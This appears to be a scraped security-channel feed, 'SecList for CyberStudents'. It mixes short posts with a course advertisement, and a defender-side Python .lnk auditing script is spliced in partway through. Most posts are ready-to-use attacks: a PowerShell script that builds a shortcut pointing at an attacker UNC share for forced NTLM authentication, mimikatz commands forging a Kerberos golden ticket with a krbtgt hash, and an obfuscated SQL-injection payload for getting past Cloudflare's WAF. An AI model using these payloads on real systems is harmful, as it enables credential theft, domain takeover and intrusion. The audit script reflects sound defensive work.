SecList for CyberStudents
Think outside the box
Token Impersonation
$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\Your_IP\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()


Additional resources for forced authentication: https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication#execution-via-.rtf

#LNK_File_Attack
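A defender-side check for the shortcut technique in the post above, as an added example that is not part of the original post: it reads `.lnk` files as raw bytes, without opening them through the shell, and reports any UNC path embedded in them. The regex scan is a heuristic, not a full Shell Link parser; the function names and the sample bytes in `_sample` are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Shell Link header: HeaderSize 0x4C followed by the LinkCLSID.
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")

# \\host\rest stored as single-byte text and as UTF-16LE text.
UNC_ANSI = re.compile(rb"\\\\[\w.@:-]+\\[\x20-\x7e]+")
UNC_UTF16 = re.compile(rb"(?:\\\x00){2}(?:[\w.@:-]\x00)+\\\x00(?:[\x20-\x7e]\x00)+")


def unc_paths(data: bytes) -> list[str]:
    """Return every UNC path string found in the raw bytes of a .lnk file."""
    if not data.startswith(LNK_MAGIC):
        return []  # not a shortcut, ignore
    found = [m.group().decode("ascii") for m in UNC_ANSI.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in UNC_UTF16.finditer(data)]
    return sorted(set(found))


def audit(root: str) -> dict[str, list[str]]:
    """Map each shortcut under root to the UNC paths it references."""
    hits = {}
    for path in Path(root).rglob("*.lnk"):
        try:
            paths = unc_paths(path.read_bytes())
        except OSError:
            continue  # unreadable file, skip
        if paths:
            hits[str(path)] = paths
    return hits


def _sample(target: str) -> bytes:
    """Constructed input: header magic, zero padding, one UTF-16LE string."""
    return LNK_MAGIC + bytes(56) + target.encode("utf-16-le") + b"\x00\x00"


if __name__ == "__main__":
    # Usage: python lnk_audit.py <directory>  (script name is an assumption)
    for lnk, paths in audit(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(lnk, "->", ", ".join(paths))
```

Shortcuts that point at known internal file servers will also be reported, so compare the hosts against an allow-list before treating a hit as suspicious.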
1. mimikatz # privilege::debug

2. lsadump::lsa /inject /name:krbtgt

We need the NTLM hash and SID

3. mimikatz # kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-1139169715-366527789-3857901133 /krbtgt:4793b8acca133d3b82c5c96438996d68 /id:500 /ptt


#Golden_Ticket_Attack
BTL1 Blue Team Level 1, the blue team OSCP? An expletive laden review of the comprehensive defense fundamentals course, from someone who passed with 100% on their first attempt!
I passed on my first attempt with 100%, this is my review: https://medium.com/@seccult/btl1-blue-team-level-1-the-blue-team-oscp-3c09ca5f1f8c

Discuss on Reddit: https://ift.tt/OkCcf2r
@blueteamalerts
PoC for CVE-2025-48799, an elevation of privilege vulnerability in Windows Update service.

https://github.com/Wh04m1001/CVE-2025-48799/
Account Management Events
When analyzing the Account Logon and Logon events on a DC, keep an eye out for the following Event IDs.
Forwarded from Brut Security
πŸ›‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi

When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!

❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden

✅ Bypass Payload

(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)



πŸ” This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.

✅ Credit: @nav1n0x
Forwarded from Turan Security
Friends, we are announcing the news many of you have long been waiting for. The cybersecurity organization Turan Security has opened admission to special cybersecurity courses based on real practice!
You will no longer have to ask yourself which training center to study at.
Learn offensive and defensive cybersecurity from the true professionals of the field. Experienced specialists with more than 7 years of experience and international certificates will act as mentors. In addition, practical lessons will be organized by Turan Security specialists.

Students who are admitted:
In the general 2-month Foundation stage, they will gain specialized knowledge of basic IT fundamentals and of network and Linux administration.

💻 Students who successfully complete this stage will receive 6 months of practice-based specialized training in two tracks, offensive (red team) and defensive (blue team) cybersecurity.

🔴 Red Team: The offensive cybersecurity track covers identifying vulnerabilities in an organization's websites, internal information systems and network systems. It teaches how to gain access to data using the identified vulnerabilities and how to prevent those vulnerabilities.

🔵 Blue Team: The defensive cybersecurity track gives practical knowledge of preventing vulnerabilities identified in an organization's internal and external systems, detecting and analyzing cybersecurity incidents, and installing and monitoring threat-detection systems.

Those who want to study should contact the admin for detailed information!
🟦🟦🟦

@TuranSecurity | www.turansec.uz | [email protected]